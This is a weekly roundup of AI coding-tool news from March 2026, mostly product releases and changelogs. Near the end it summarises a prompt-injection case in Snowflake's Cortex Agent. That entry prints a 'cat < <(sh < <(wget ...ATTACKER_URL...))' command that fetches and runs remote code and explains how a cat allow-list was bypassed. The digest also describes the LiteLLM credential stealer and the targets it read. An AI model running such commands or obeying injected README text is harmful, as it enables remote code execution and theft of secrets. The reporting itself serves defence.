Weekly Report
Mar 26 - Apr 1, 2026
A curated summary of the most important updates in AI from the last 7 days.
New Products
OpenAI Adds Open Source Tools to Help Developers Build for Teen Safety
OpenAI released a set of open-source prompts that developers can use to make their AI apps safer for teens. The policies work with OpenAI's gpt-oss-safeguard model but are designed as prompts to be compatible with other models. They address issues like graphic violence, sexual content, harmful body ideals, dangerous activities, romantic or violent roleplay, and age-restricted goods. Developed with Common Sense Media and everyone.ai, the prompts help translate safety goals into operational rules to avoid protection gaps, inconsistent enforcement, or overly broad filtering.
Apple Overhauls App Developer Platform With 100 New Metrics
Apple announced a major update to App Store Connect, adding over 100 new metrics for tracking monetization, subscription data, and user behavior. The update provides first-party insights based on Apple's actual data rather than estimates from third-party services. New features include subscription reports exportable via API, cohort analysis for user behavior, peer group benchmarks for comparison, and up to seven simultaneous filters. The timing suggests Apple is working to ensure AI elevates rather than destroys its App Store ecosystem as AI agents become more capable.
IronEngine: Towards General AI Assistant
March 2026 arXiv paper presenting IronEngine, a general AI assistant platform organized around a unified orchestration core connecting desktop users. The paper focuses on general AI assistance capabilities and represents ongoing research into more comprehensive AI agent systems that can handle diverse tasks beyond just coding.
Cursor Composer 2
A frontier-level coding model released by Cursor that delivers large improvements on all benchmarks including Terminal-Bench 2.0 (61.7) and SWE-bench Multilingual (73.7). Built on Moonshot AI's Kimi K2.5 model, it's priced at $0.50/M input and $2.50/M output tokens, offering an optimal combination of intelligence and cost for AI coding workflows.
March 2026: Customizable Keyboard Shortcuts (v0.35.0)
Version 0.35.0 released March 24, 2026. Major feature: Customizable keyboard shortcuts including support for literal character bindings. Enhanced keybinding system and input flexibility improvements. Focus on user experience improvements around keyboard customization and input handling.
March 2026: Agentic Capabilities, Student Plan, and VS 2026 Integration
March 11, 2026: Major agentic capabilities improvements in JetBrains IDEs with custom features. March 13: New GitHub Copilot Student plan launched. Visual Studio 2026 integration updates include Copilot memories, AI-powered vulnerability fixes, AI-tailored coding standards, and 25% more screen space via Insignificant Line Compression. April 24 announced: Copilot interactions will be used for AI model training.
Package Managers Need to Cool Down - Dependency cooldown mechanisms
Following the LiteLLM supply chain attack, Simon revisits dependency cooldowns - only installing updated dependencies after they've been available for a few days. The article reviews current state of cooldown mechanisms across major packaging tools: pnpm 10.16, Yarn 4.10.0, Bun 1.3, Deno 2.6, uv 0.9.17, pip 26.0, and npm 11.10.0 all now support various forms of minimum release age gates to protect against supply chain attacks.
Cursor Composer 2 built on Kimi K2.5 model
Kimi.ai confirmed that Cursor's newly launched Composer 2 was built on top of Kimi K2.5 model. Cursor accesses Kimi K2.5 via FireworksAI hosted RL and inference platform as part of an authorized commercial partnership. This represents continued pre-training and high-compute RL training on the open model.
Computer Use Research Preview in Claude Code
March 23, 2026 release adds computer use capabilities to Claude Code and Cowork, allowing Claude to interact with your computer system including browser automation and local file operations. Available to Pro and Max plan subscribers. Also includes Dispatch improvements for task management.
Copilot Coding Agent 50% Faster Startup
March 19, 2026 release improves Copilot coding agent startup performance by 50%, allowing developers to begin work more quickly. Performance optimization applies to agent initialization and task preparation workflows across all supported IDEs.
Version 1.9577.43 - Quota Billing System
March 19, 2026 release introduces a new quota billing system for Windsurf usage tracking and management. Users can now monitor and manage their API quota consumption more effectively with improved billing controls and visibility.
Version 1.3.33 - Claude Sonnet and Opus 4.6 Updates
Latest release adds Claude Sonnet and Opus 4.6 model updates, integrates AI SDK provider, adds bash tool execution in background, turn-level prompt caching, PostHog metrics, live API tests, hooks system for CLI event interception, and 5 agent checks derived from codebase history. Includes multiple security upgrades and dependency updates.
Version 2.1.79 Release
Added --console flag for Anthropic Console authentication, Show turn duration toggle, and VSCode remote-control feature. Fixed numerous issues including subprocess hanging, Ctrl+C in print mode, voice mode activation, and improved startup memory usage by ~18MB.
Bugbot Autofix
Cursor released Bugbot Autofix, an automated bug detection and fixing feature that proactively identifies and resolves common coding issues.
v2.1.86
Major bugfix release with 23 fixes including: Added session ID header for proxies, fixed resume failures, Write/Edit/Read issues with conditional skills, performance issues from config disk writes, out-of-memory crashes with /feedback, MCP tools in --bare mode, OAuth URL copying, masked input leaks, and plugin script permissions. Also reduced startup stalls and token overhead.
v2.1.85
Major feature release with 27 improvements including: Environment variables for MCP servers, conditional hooks with permission rule syntax, timestamp markers for scheduled tasks, 5000-character deep link query support, RFC 9728 OAuth discovery, PreToolUse hook enhancements, and organization policy enforcement. Fixed 20 issues including /compact failures, plugin enable/disable issues, worktree hook problems, and terminal keyboard mode issues.
v2.1.84
Feature release adding PowerShell tool for Windows, new environment variables for model overrides, streaming idle timeout configuration, TaskCreated hook support, and WorktreeCreate HTTP support. Fixed voice mode issues, keybinding problems, and workflow subagent failures. Improved startup performance and scroll handling.
v2.1.83
Major feature release with 46 improvements: Added managed-settings.d drop-in directory, CwdChanged and FileChanged hooks, transcript search, Ctrl+X Ctrl+E external editor alias, pasted image positional chips, and agent initialPrompt support. Fixed 31 issues including mouse tracking, hangs, voice mode startup, plugin hooks, and background agents. Improved startup performance and reduced memory usage.
v2.1.81
Added --bare flag for scripted calls and --channels permission relay. Fixed OAuth authentication issues, voice mode failures, experimental betas header, and plugin hook blocking. Improved MCP read/search display and plugin freshness. Remote Control session titles and plan mode adjustments.
v2.1.77
Increased maximum output token limits for Claude Opus 4.6 to 64k tokens default and 128k tokens upper bound. Added allowRead sandbox setting and optional index for /copy. Fixed Always Allow on compound commands, auto-updater memory issues, resume truncation, PreToolUse permission bypass, CRLF line ending conversion, and beta headers.
Composer 2
Composer 2 is now available in Cursor, offering frontier-level coding performance with strong results on CursorBench, Terminal-Bench 2.0, and SWE-bench Multilingual. The model delivers large improvements over previous versions with scores of 61.3 on CursorBench, 61.7 on Terminal-Bench 2.0, and 73.7 on SWE-bench Multilingual. It's priced at $0.50/M input and $2.50/M output tokens, with a faster variant available at $1.50/M input and $7.50/M output tokens.
GitHub Copilot for Jira — Public preview enhancements
Since launching the public preview of GitHub Copilot coding agent for Jira, GitHub has made enhancements based on customer feedback. Copilot now includes Jira ticket numbers in PR titles and branch names, adds links back to originating Jira tickets, and includes Jira context provided to the agent.
Devin can now Schedule Devins
Devin can now schedule its own recurring sessions to handle repetitive tasks like weekly release notes, feature flag cleanups, and QA sweeps. Users can run a task once, and if successful, tell Devin to keep doing it on a schedule. Devin maintains state between runs, so each session picks up where the last one left off, building on context rather than starting from scratch.
Main Branch Features (Unreleased)
The main branch contains unreleased features including: Claude 4.5/4.6 model support, expanded Gemini support (2.5 Flash, Flash-Lite, and Gemini 3 preview), DeepSeek Reasoner model, new `/ok` command shortcut, and support for GPT-5.1/5.2/5.3/5.4 variants across multiple providers. Aider wrote 62% of the code in this upcoming release.
Version 1.3.37 - VSCode Bugfix Release
Removed Ollama template-based tool support gate and resolved JetBrains compatibility issues with improved dependency management.
Introducing New Windsurf Pricing Plans
Windsurf simplified their pricing structure with new Free, Pro, Teams, and Max plans. The new system replaces the previous credit-based model with industry-standard quotas, introducing a new Max tier for power users.
New Features
March 2026: Self-Hosted Cloud Agents, Automations, and MCP Apps
March 25, 2026: Self-hosted cloud agents keeping code execution in user infrastructure. March 11: 30+ new plugins added to marketplace. March 5: Automations feature for trigger-based always-on agents. March 3: Version 2.6 with interactive UIs in agent chats, MCP Apps and Team Marketplaces for plugin sharing, and improved debugging mode.
March 2026: GPT-5.4 Integration and JetBrains Plugin Updates
GPT-5.4 availability with multiple reasoning effort levels, available in Arena Mode's Frontier Arena and Hybrid Arena battle groups. JetBrains plugin version 2.12.18 (March 19, 2026) with improved file search performance and fixes for diagnostics downloading while changing file names. Various bug fixes and stability improvements including Cascade internal error reductions.
March 2026: Voice Mode, Session Forking, and Remote Control
Major March 2026 updates bringing Voice Mode with 20-language support and push-to-talk functionality (hold spacebar), session forking for isolated sub-agent execution, remote sessions with session teleportation between devices, enhanced transcript search, improved sandbox controls with auto-mode for safer autonomous operations, and customizable keybindings throughout the interface.
Experimenting with Starlette 1.0 with Claude skills
Simon explores Starlette 1.0, a lightweight ASGI framework and foundation of FastAPI. The article covers building robust web applications with Starlette, including a demo task management app with routing, templating (Jinja2), async database operations (aiosqlite), and real-time updates. Simon uses Claude 'skills' - prompts packaged as reusable tools - to experiment with the framework.
Using Git with coding agents - Agentic Engineering Patterns
Git is essential for working with coding agents. This guide covers Git essentials (repositories, commits, branches, merging) and how coding agents can use Git's features fluently. Simon explains that we don't need to memorize Git commands but should understand what's possible to take full advantage of Git's capabilities when working with AI agents.
Autoresearching Apple's 'LLM in a Flash' to run Qwen 397B locally
Dan Woods managed to get Qwen3.5-397B-A17B running at 5.5+ tokens/second on a 48GB MacBook Pro M3 Max, despite the model taking 209GB (120GB quantized) on disk. The technique uses Apple's 'LLM in a flash' paper - streaming expert weights from SSD for Mixture-of-Experts models. Dan fed the paper to Claude Code and used Andrej Karpathy's autoresearch pattern to run 90 experiments, producing MLX Objective-C and Metal code. Experts are quantized to 2-bit (later upgraded to 4-bit after finding 2-bit broke tool calling).
Main Branch - Latest Model Support
Main branch updates include added support for Claude 4.5/4.6 models and updated model aliases, expanded Gemini model support with 2.5 Flash and Flash-Lite, added Gemini 3 preview models, DeepSeek Reasoner model support, and settings for new OpenAI GPT-5.1/5.2 and GPT-5-pro models across OpenAI, Azure, and OpenRouter.
Desktop Support Enabled by Default
Devin enabled desktop support by default, improving native application performance and integration with local development environments.
v2.1.87
Fixed messages in Cowork Dispatch not getting delivered
v2.1.80
Added rate_limits field to statusline scripts, settings-source plugins, CLI tool usage detection in plugin tips, effort frontmatter for skills, and --channels research preview. Fixed --resume dropping parallel tool results and voice mode WebSocket failures. Improved file autocomplete performance and reduced memory usage.
v2.1.79
Added --console flag for Anthropic Console authentication, Show turn duration toggle, and /remote-control for VSCode. Fixed subprocess hanging in -p mode, Ctrl+C issues, /btw returning wrong output, and voice mode activation. Improved startup memory usage by 18MB and added better timeout handling.
v2.1.78
Added StopFailure hook event, CLAUDE_PLUGIN_DATA variable for plugin state, effort/disallowedTools frontmatter for agents, and line-by-line response streaming. Fixed multiple issues including git log in sandbox, session truncation on large sessions, infinite loops from API errors, permission rules bypass, and sandbox security. Improved memory usage and startup time.
Self-hosted Cloud Agents
Cursor now supports self-hosted cloud agents that keep code and tool execution entirely in your own network. Your codebase, build outputs, and secrets all stay on internal machines running in your infrastructure, while the agent handles tool calls locally. Self-hosted cloud agents offer the same capabilities as Cursor-hosted cloud agents, including isolated VMs, full development environments, multi-model harnesses, and plugins.
Copilot usage metrics now identify active Copilot coding agent users
Copilot usage metrics now indicate which users have Copilot coding agent (CCA) activity. Enterprise and organization admins can identify which users are actively using Copilot coding agent on daily and weekly bases through improved metrics dashboards.
Ask @copilot to make changes to a pull request
You can now mention @copilot in pull requests to ask Copilot to make changes. It can fix failing GitHub Actions workflows, address review comments, refactor code, and update documentation based on your instructions.
Exception Handling Improvements
Added ExInfo for PermissionDeniedError to improve error handling and mapping. Fixed exception mapping to only include real exception classes, avoiding runtime errors. Contributed by Claudia Pellegrino.
Version 1.3.38 - VSCode Extension Update
Added support for .continue/configs directory, filtered session history by workspace directory, and improved configuration handling with enhanced dependency updates.
Version 1.0.67 - JetBrains Extension Update
Fixed Winston logger stream corruption, improved config.yaml handling, and added session history filtering by workspace with dependency security patches.
Version 1.3.36 - VSCode Security Update
Resolved critical security vulnerabilities, added ModelDescription type callbacks, and fixed StringIndexOutOfBoundsException with improved error handling.
Version 0.35.0 - Enhanced Developer Experience
Introduced customizable keyboard shortcuts with Kitty protocol support, improved Vim mode with yank/paste operations, added Linux sandboxing with bubblewrap/seccomp, and implemented JIT context discovery for better model performance.
Version 0.34.0 - Plan Mode & Sandboxing Improvements
Enabled Plan Mode by default for systematic task breakdown, added native gVisor and LXC container sandboxing support for safer execution environments.
ClawRouter Cost-Optimized Model Routing
Integration of ClawRouter as a new LLM provider that automatically selects the cheapest capable model for each request based on prompt complexity, providing 78-96% cost savings on blended inference costs. Added support for 'auto', 'free', and 'eco' models with full documentation.
Allow Multiple Context Providers of Same Type
Updated config.yaml support to allow multiple context providers of the same type, providing greater flexibility for advanced configurations.
New Technologies
Understanding Software Engineers' Cognitive Engagement with Agentic Coding Assistants
An arXiv paper from March 2026 examining cognitive engagement with agentic coding assistants. Key finding: Cognitive engagement consistently declines as tasks progress, highlighting design limitations in current coding assistants. The research suggests that while AI coding tools can boost initial productivity, they may reduce developer engagement and understanding over the course of complex tasks.
Leanstral
An open-source AI coding agent specifically designed for Lean 4 formal proof engineering. Built by Mistral AI, it enables 'trustworthy vibe-coding' by generating code with formal proofs, achieving 26.3 points on the FLTEval benchmark at 1/15th the cost of Claude Sonnet 4.6.
Malicious litellm_init.pth in litellm 1.82.8 - Credential stealer
The LiteLLM v1.82.8 package on PyPI was compromised with a credential stealer hidden in base64 in a litellm_init.pth file, triggered just by installing the package (no import needed). It stole secrets from ~/.ssh/, ~/.gitconfig, ~/.aws/, ~/.kube/, ~/.config/, ~/.azure/, ~/.docker/, and many other locations. The attack started with a Trivy exploit that stole PyPI credentials. PyPI quarantined the package within hours.
Streaming experts: Running 1T parameter models on consumer hardware
Dan Woods' experiments with streaming experts - running larger Mixture-of-Experts models on hardware without enough RAM by streaming expert weights from SSD for each token. @seikixtc reported running Kimi K2.5 (1 trillion parameters, 32B active weights) in 96GB RAM on M2 Max MacBook Pro. @anemll showed Qwen3.5-397B-A17B running on iPhone at 0.6 tokens/second. Daniel Isaac got Kimi K2.5 working on 128GB M4 Max at ~1.7 tokens/second.
The real work of software development: LLMs can't choose
Quote from David Abram: 'The hardest parts of the job were never about typing out code. I have always struggled most with understanding systems, debugging things that made no sense, designing architectures that wouldn't collapse under heavy load, and making decisions that would save months of pain later. None of these problems can be solved by LLMs... they don't choose. That part is still yours. The real work of software development, the part that makes someone valuable, is knowing what should exist in the first place, and why.'
Profiling Hacker News users based on their comments
Simon experiments with a 'mildly dystopian prompt': 'Profile this user' accompanied by a copy of their last 1,000 comments on Hacker News. The article explores using LLMs to analyze user behavior patterns, expertise areas, communication style, and interests from their comment history.
Turbo Pascal 3.02A deconstructed - AI hallucination revealed
Simon used Claude to decompile Borland's 1985 Turbo Pascal 3.02 (39,731 bytes) into an interactive artifact showing binary memory map and decompiled code. However, it was later revealed to be 'hallucinated slop' - a Hacker News reviewer found that many code snippets were fabricated and don't exist in the actual binary. Claude agreed with the assessment when the feedback was provided, highlighting the risk of AI-generated technical analysis.
Junie CLI
A fully standalone command-line interface for JetBrains' AI agent, previously only available as an IDE extension. Junie CLI supports macOS, Linux, and Windows, with support for models from OpenAI, Anthropic, Google, and Grok, priced from $10/month for individuals.
GPT-5.3 and GPT-5.4 Model Support Added
Aider added support for new OpenAI GPT-5.3 and GPT-5.4 model variants across OpenAI, Azure, and OpenRouter providers. This includes both chat and codex variants, expanding the suite of GPT-5 models available to users.
Deprecated Models Removed from Tests
Replaced deprecated models (gpt-4-32k, claude-3-5-sonnet-20240620, and gpt-4-vision-preview) in unit tests with currently available alternatives to ensure tests pass correctly.
DeepSeek max_tokens to max_completion_tokens Mapping
Fixed OpenAI adapter to properly map max_tokens to max_completion_tokens parameter for DeepSeek reasoning models, ensuring correct API compatibility.
Ollama Tool Call Parsing Error Messages
Added actionable error messages when Ollama fails to parse tool calls, improving user experience by providing clear guidance when configuration or model issues occur.
vLLM Provider Configuration Fixes
Fixed vLLM provider to properly respect user-configured contextLength and model settings, ensuring user configurations are properly applied.
Others
Untitled
No description available.
Auto mode for Claude Code
Anthropic introduced a new 'auto mode' in Claude Code where Claude makes permission decisions on your behalf with safeguards. The safeguards use Claude Sonnet 4.6 as a classifier to review actions before they run, blocking actions that escalate beyond task scope or target untrusted infrastructure. The system has extensive default filters for allowed operations (like local file operations and read-only calls) and blocked operations (like git force push, downloading and executing external code). Simon Willison remains skeptical of prompt-based protections, preferring deterministic sandboxes for AI coding agents.
Snowflake Cortex AI Escapes Sandbox and Executes Malware
PromptArmor report on a prompt injection attack chain in Snowflake's Cortex Agent, now fixed. The attack started when a Cortex user asked the agent to review a GitHub repository that had a prompt injection attack hidden at the bottom of the README. The attack caused the agent to execute malicious code via process substitution. Cortex listed cat commands as safe to run without human approval, without protecting against process substitution. Simon Willison notes he doesn't trust allow-lists against command patterns and prefers deterministic sandboxes that operate outside the agent layer.
Auto mode for Claude Code - New AI-based permission safeguards
Claude Code introduced 'auto mode' as an alternative to --dangerously-skip-permissions, where Claude makes permission decisions on your behalf with safeguards. The safeguards use Claude Sonnet 4.6 as a classifier to review actions before they run, blocking actions that escalate beyond scope or target untrusted infrastructure. However, Simon remains unconvinced by prompt injection protections that rely on AI since they're non-deterministic by nature, and still prefers deterministic sandboxes.
Thoughts on OpenAI acquiring Astral and uv/ruff/ty
Simon shares thoughts on OpenAI's acquisition of Astral, the company behind uv, ruff, and ty - three increasingly load-bearing open source projects in the Python ecosystem. The article discusses implications for the Python community, open source sustainability, and how these tools fit into AI-assisted development workflows.
Snowflake Cortex AI escapes sandbox and executes malware
PromptArmor report on a prompt injection attack in Snowflake's Cortex Agent (now fixed). The attack started when a user asked the agent to review a GitHub repository with prompt injection hidden in the README. The agent executed malicious code via process substitution: `cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))`. Cortex allowed `cat` commands without protecting against process substitution. Simon notes that allow-lists against command patterns feel unreliable and prefers deterministic sandboxes.
Create issues from Slack with Copilot
You can now create GitHub Issues directly from Slack using natural language with the GitHub app for Slack. Mention @GitHub in any channel, describe the work you need to track, and Copilot will automatically create a properly formatted issue.
Ask @copilot to resolve merge conflicts on pull requests
Copilot coding agent can now resolve merge conflicts on pull requests. Simply mention @copilot in a comment and tell it to resolve the conflicts, and it will attempt to fix them automatically.
Manage Copilot coding agent repository access via the API
Organization owners can now manage Copilot coding agent access at scale programmatically with new Copilot coding agent management REST APIs, available in public preview. This enables automation of repository access permissions for Copilot agents.
Devin can now Manage Devins
Devin can now break down large tasks and delegate them to a team of managed Devins that work in parallel. Each managed Devin runs in its own isolated virtual machine with its own terminal, browser, and development environment. The main Devin acts as a coordinator, scoping work, assigning tasks, monitoring progress, resolving conflicts, and compiling results.
Filter Session History by Workspace Directory
Added optional workspaceDirectory field to ListHistoryOptions, allowing users to scope session lists to a specific workspace with case-insensitive filtering applied before pagination. Addresses issue #9936.
.continue/configs Directory Support
Added support for loading local profiles from .continue/configs/ directory alongside existing .continue/agents/ and .continue/assistants/ directories, providing a third configuration location for better organization.
Chunk Large JCEF Messages for JetBrains
Implemented chunking for large JCEF messages to prevent JetBrains sidebar freezes, improving stability and responsiveness for JetBrains IDE users.
Critical and High Security Vulnerability Fixes
Resolved critical and high-severity security vulnerabilities across dependencies, enhancing overall security posture.
Quota Billing Implementation
Added support for the new quota billing system with daily and weekly quota usage now displayed directly in the IDE. Includes a fix for Mac x64 build issues.